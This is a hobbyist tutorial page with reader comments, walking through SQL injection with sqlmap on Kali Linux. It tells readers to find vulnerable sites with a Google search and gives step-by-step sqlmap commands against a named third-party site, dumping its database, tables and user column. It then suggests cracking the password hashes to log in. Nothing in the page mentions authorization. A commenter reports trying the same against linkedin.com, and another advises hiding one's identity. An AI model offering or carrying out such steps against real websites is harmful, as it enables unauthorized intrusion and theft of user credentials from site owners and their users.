Introduction: Hacking Websites With Sqlmap and Kali Linux

Picture of Hacking Websites With Sqlmap and Kali Linux

So your on the point that you want to hack websites with Kali Linux? Well then your on the right place! Today I'm going to show you how to hack a site with sqlmap in Kali Linux.

Step 1: Fire Up Kali Linux

Picture of Fire Up Kali Linux

I guess you know how to do this step :D

Step 2: Start a New Terminal

Picture of Start a New Terminal

Start by opening a new terminal. We'll use this terminal later.

Step 3: Find a Vulnerable Website

Picture of Find a Vulnerable Website

Go to Google and search for: php?id=1. If you found a site that got that in their link put an ' after the 1. If it says that there's a problem with the sql syntax then the site is vulnerable.

Step 4: Using Sqlmap to Hack It

Picture of Using Sqlmap to Hack It

In your terminal type:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs

(http://www.angelvestgroup.com/info.php?id=1 is my vulnerable url)

Now it's going to load the databases...

If that's done you'll need to select a database by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china --tables

(angelvest_china is the database I found)

Now it's going to load all the information that's in the database you've selected.

Now you'll need to select a table by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user --column

(db_user is the table I found)

Now you need to select a column by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user -C username --dump

(username is the name of the column that I found)

Now it will dump the information in the column username and: you've hacked it! (On that site there is a column called passwords too so you just need to decrypt the hashes in that column and boom! You can login.)

Congrats! You've just hacked a website with sqlmap! If you liked the instructable you should take a look at my other instructables too! Stay tuned for more!

Comments

arslanahmad (author)2017-01-08

[18:26:54] [CRITICAL] host 'www.linkedin.com' does not exist

how i can handle this problum..

while i heacking a wabsite

MarcusW51 (author)arslanahmad2017-10-10

Did you remember to put http:// before it?

Mohsen86on (author)2016-11-11

Hi, can you reach me at soheil.singh86@gmail.com as i have some trade to share.

Joshua6 (author)Mohsen86on2016-12-29

what?

amaharajan (author)2016-05-13

great job bro!!!

Tanyajessica555 (author)2015-09-23

Can you please message or reply to this comment I have a question

text me on +9198711100514

OmarD11 (author)Tanyajessica5552016-01-14

text me +212699417549

CoenW1 (author)Tanyajessica5552015-09-23

What's your question?

s-elroy-jetson (author)2015-10-18

A great intro to SQL injection. Be safe, kids! Learn to make yourself as invisible as possible before attempting any hacks, and have the admin's permission as well.

About This Instructable

109,136views

32favorites

License:

More by CoenW1:Hacking websites with sqlmap and kali linuxHack a computer on your network with kali linuxFUNNY BATCH PRANK
Add instructable to: